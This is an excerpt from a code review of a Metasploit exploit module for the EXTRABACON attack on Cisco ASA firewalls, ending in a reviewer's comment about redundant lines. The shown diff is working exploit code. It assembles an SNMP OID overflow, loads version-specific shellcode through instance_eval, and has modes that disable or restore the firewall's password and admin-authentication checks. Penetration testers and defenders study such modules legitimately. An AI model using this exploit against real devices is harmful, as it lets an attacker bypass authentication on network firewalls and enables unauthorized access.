modules/exploits/firewall/extrabacon.rb

```diff
@@ -0,0 +1,371 @@
+      if exba_targets.has_value?(vb.value.to_s)
+        print_status("[#{target_asa}]: Vulnerable target detected: #{vb.value.to_s}\n")
+        return Exploit::CheckCode::Vulnerable
+      else
+        print_warning("Unable to determine if target is vulnerable.  Response: #{vb.value.to_s}")
+        return Exploit::CheckCode::Unknown
+      end
+    end
+  end
+
+  # TODO: write code that is actually type aware
+
+  def my_tlv(tag="\x30\x82", data)
+    ln = 0
+    p = ""
+    p.force_encoding('binary')
+    p << tag
+
+    # compute length
+
+    data.each do |x|
+      ln += x.length
+    end
+
+    # insert it
+
+    if tag == "\x04\x81" || tag == "\x30\x81" || tag == "\x06\x81"
+      p << ln
+    elsif ln >= 0x80 || tag == "\xa5\x82"
+      p << [ln].pack('n')
+    else
+      p << ln
+    end
+
+    # insert all items
+
+    data.each do |x|
+      p.force_encoding('binary')
+      x.force_encoding('binary')
+      p << x
+    end
+    p
+  end
+
+  def hex(buf)
+    return Rex::Text.to_hex_dump(buf, width=16, base=0)
+  end
+
+  def setup
+    sc_file = File.join(Msf::Config.data_directory, "exploits", "EXTRABACON", "versions", "shellcode_" + target['Version'] + ".rb")
+
+    if datastore['Verbose'] == true
+      print_status("Using config file: #{sc_file}")
+    end
+
+    if !(File.file?(sc_file))
+      print_error("#{sc_file} not found!")
+      exit
+    end
+
+    content = ""
+    f = File.open(sc_file, "rb")
+    f.each_line {|x|
+      content << x
+    }
+
+    @eb = ExtraBacon.new
+    @eb.instance_eval(content)
+  end
+
+  def append_shellcode()
+    p = ""
+    if datastore['Mode'] == "pass-disable"
+      p << @eb.payload_PMCHECK_DISABLE_byte
+      p << @eb.payload_AAAADMINAUTH_DISABLE_byte
+    elsif datastore['Mode'] == "pass-enable"
+      p << @eb.payload_PMCHECK_ENABLE_byte
+      p << @eb.payload_AAAADMINAUTH_ENABLE_byte
+    else
+      return "unsupported"
+    end
+    p << @eb.retn
+    p
+  end
+
+  def post_ex(packet, request_id)
+    p = packet.unpack("H*")[0]
+
+    print_status("Got response.  Checking request-id ....")
+    if datastore['Verbose'] == true
+      print_status("Response:\n#{hex(packet)}")
+    end
+    if p.include? request_id.to_s(16) # not quite fool-proof but it'll work
+      print_status("Response request-id matches!  Success is extremely likely.")
+    else
+      print_error("Response request-id does NOT match.  Something may have gone wrong ...")
+    end
+  end
+
+  def exploit
+
+    target_asa  = datastore['RHOST']
+    target_port = datastore['RPORT']
+    comm        = datastore['Community']
+    head = '1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9'
+    head_len = head.split('.').length
+
+    wrapper = @eb.preamble_snmp
+    wrapper += "."
+    wrapper += @eb.launcher_snmp
+    wrapper += "."
+    wrapper += @eb.postscript_snmp
+    wrapper_len = wrapper.split('.').length
+    wrapper += ".144" * (82 - wrapper_len)
+    wrapper_len = wrapper.split('.').length
```

Comment:
The ``wrapper_len`` above here is redundant and can be removed, as all of the force_encoding calls.